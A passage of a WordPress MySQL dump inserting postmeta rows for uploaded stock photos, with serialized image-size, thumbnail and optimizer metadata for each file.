INSERT INTO `wp_postmeta` VALUES (431, 233, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3872;s:6:"height";i:2592;s:4:"file";s:29:"2016/08/Medical-Home-Page.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"Medical-Home-Page-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"Medical-Home-Page-800x536.jpg";s:5:"width";i:800;s:6:"height";i:536;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"Medical-Home-Page-768x514.jpg";s:5:"width";i:768;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"Medical-Home-Page-1600x1071.jpg";s:5:"width";i:1600;s:6:"height";i:1071;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"Medical-Home-Page-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"Medical-Home-Page-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"Medical-Home-Page-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"Medical-Home-Page-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (432, 237, '_wp_attached_file', '2016/08/canstockphoto8309880.jpg'); 
INSERT INTO `wp_postmeta` VALUES (433, 237, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1996;s:4:"file";s:32:"2016/08/canstockphoto8309880.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto8309880-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto8309880-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto8309880-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto8309880-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto8309880-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto8309880-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto8309880-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto8309880-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (434, 238, '_wp_attached_file', '2016/08/canstockphoto0406435.jpg'); 
INSERT INTO `wp_postmeta` VALUES (435, 238, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:32:"2016/08/canstockphoto0406435.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0406435-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto0406435-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto0406435-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto0406435-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0406435-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0406435-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto0406435-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto0406435-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (436, 239, '_wp_attached_file', '2016/08/canstockphoto0762793.jpg'); 
INSERT INTO `wp_postmeta` VALUES (437, 239, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3504;s:6:"height";i:2336;s:4:"file";s:32:"2016/08/canstockphoto0762793.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0762793-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto0762793-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto0762793-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto0762793-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0762793-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto0762793-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto0762793-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto0762793-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (438, 240, '_wp_attached_file', '2016/08/canstockphoto1519976.jpg'); 
INSERT INTO `wp_postmeta` VALUES (439, 240, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2032;s:6:"height";i:2865;s:4:"file";s:32:"2016/08/canstockphoto1519976.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto1519976-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto1519976-567x800.jpg";s:5:"width";i:567;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto1519976-768x1083.jpg";s:5:"width";i:768;s:6:"height";i:1083;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto1519976-1135x1600.jpg";s:5:"width";i:1135;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto1519976-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto1519976-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto1519976-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto1519976-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (440, 241, '_wp_attached_file', '2016/08/canstockphoto3559302.jpg'); 
INSERT INTO `wp_postmeta` VALUES (441, 241, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3456;s:6:"height";i:2304;s:4:"file";s:32:"2016/08/canstockphoto3559302.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto3559302-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto3559302-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto3559302-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto3559302-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto3559302-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto3559302-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto3559302-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto3559302-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (442, 242, '_wp_attached_file', '2016/08/canstockphoto4506528.jpg'); 
INSERT INTO `wp_postmeta` VALUES (443, 242, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3054;s:6:"height";i:2592;s:4:"file";s:32:"2016/08/canstockphoto4506528.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto4506528-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto4506528-800x679.jpg";s:5:"width";i:800;s:6:"height";i:679;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto4506528-768x652.jpg";s:5:"width";i:768;s:6:"height";i:652;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto4506528-1600x1358.jpg";s:5:"width";i:1600;s:6:"height";i:1358;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto4506528-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto4506528-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto4506528-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto4506528-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (444, 243, '_wp_attached_file', '2016/08/canstockphoto4583899.jpg'); 
INSERT INTO `wp_postmeta` VALUES (445, 243, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:32:"2016/08/canstockphoto4583899.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto4583899-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto4583899-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto4583899-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto4583899-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto4583899-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto4583899-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto4583899-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto4583899-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (446, 244, '_wp_attached_file', '2016/08/canstockphoto5265069.jpg'); 
INSERT INTO `wp_postmeta` VALUES (447, 244, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3264;s:6:"height";i:2448;s:4:"file";s:32:"2016/08/canstockphoto5265069.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto5265069-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto5265069-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto5265069-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto5265069-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto5265069-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto5265069-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto5265069-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto5265069-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (448, 245, '_wp_attached_file', '2016/08/canstockphoto5432177.jpg'); 
INSERT INTO `wp_postmeta` VALUES (449, 245, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:32:"2016/08/canstockphoto5432177.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto5432177-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto5432177-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto5432177-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto5432177-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto5432177-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto5432177-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto5432177-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto5432177-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (450, 246, '_wp_attached_file', '2016/08/canstockphoto6002608.jpg'); 
INSERT INTO `wp_postmeta` VALUES (451, 246, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2008;s:4:"file";s:32:"2016/08/canstockphoto6002608.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto6002608-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto6002608-800x535.jpg";s:5:"width";i:800;s:6:"height";i:535;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto6002608-768x514.jpg";s:5:"width";i:768;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto6002608-1600x1071.jpg";s:5:"width";i:1600;s:6:"height";i:1071;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto6002608-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto6002608-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto6002608-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto6002608-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (452, 247, '_wp_attached_file', '2016/08/canstockphoto7048502.jpg'); 
INSERT INTO `wp_postmeta` VALUES (453, 247, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3500;s:6:"height";i:2325;s:4:"file";s:32:"2016/08/canstockphoto7048502.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto7048502-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto7048502-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto7048502-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto7048502-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto7048502-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto7048502-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto7048502-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto7048502-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (456, 249, '_wp_attached_file', '2016/08/canstockphoto9126509.jpg'); 
INSERT INTO `wp_postmeta` VALUES (457, 249, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1053;s:4:"file";s:32:"2016/08/canstockphoto9126509.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"canstockphoto9126509-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"canstockphoto9126509-800x527.jpg";s:5:"width";i:800;s:6:"height";i:527;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"canstockphoto9126509-768x505.jpg";s:5:"width";i:768;s:6:"height";i:505;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto9126509-1600x1053.jpg";s:5:"width";i:1600;s:6:"height";i:1053;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto9126509-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"canstockphoto9126509-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"canstockphoto9126509-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"canstockphoto9126509-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0